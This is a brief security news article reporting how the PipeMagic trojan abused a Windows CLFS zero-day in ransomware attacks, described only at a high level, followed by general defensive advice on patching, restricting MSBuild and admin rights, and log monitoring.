Phishing Trojan Exploits Windows Zero-Day Bug
Phishing trojan campaigns are evolving fast. A recent report shows that a new threat called PipeMagic is abusing a Windows zero-day flaw.
The exploit targets a vulnerability in the Windows Common Log File System (CLFS). The flaw allows attackers to gain full SYSTEM privileges.
Researchers say the attackers used this flaw in real-world ransomware attacks. Victims included companies in the U.S., Venezuela, Spain, and Saudi Arabia.
Targets came from industries like real estate, finance, software, and retail. Therefore, this shows a deliberate and global strategy by the threat actor.
How the PipeMagic Trojan Works
PipeMagic is a plugin-based trojan that has existed since 2022. It is deployed through malicious MSBuild project files.
These files include encrypted payloads that unpack and launch the trojan. Once active, the malware escalates access within the infected system.
Researchers noted that attackers used a tool called certutil to download malware. They pulled the files from a previously compromised, legitimate website.
After gaining access, the attackers dumped credentials from memory and encrypted files. Then, they left behind a ransom note tied to the RansomEXX group.
Multiple Zero-Days, One Trojan
This is not the first time PipeMagic abused zero-day flaws. It previously used another CLFS vulnerability in 2023. Furthermore, the trojan also helped deploy ransomware via a kernel bug patched just last month. This pattern shows a consistent and sophisticated attack method.
According to the report, PipeMagic exploits memory corruption through a CLFS kernel driver. It uses the RtlSetAllBits API to hijack system privileges.
Once access is granted, the trojan injects into SYSTEM processes. Then it spreads ransomware and locks files with random extensions.
Good News for Windows 11 Users
The latest version of Windows 11 (24H2) is not affected. That’s because it restricts access to certain system classes.
Only admin-level users with SeDebugPrivilege can reach those classes. Therefore, regular users are not exposed to this specific attack chain.
How to Stay Protected
To defend against phishing trojans like PipeMagic, follow these steps:
- Apply all patches promptly, especially for Windows kernel vulnerabilities.
- Disable scripting tools like MSBuild if not needed in your environment.
- Use endpoint detection with memory inspection features.
- Restrict admin privileges to essential users only.
- Monitor logs for certutil or MSBuild activity, which may signal compromise.
Cybercriminals rely on users overlooking security updates. Therefore, staying proactive with patches and permissions is critical to stopping these attacks.
Sleep well, we got you covered.
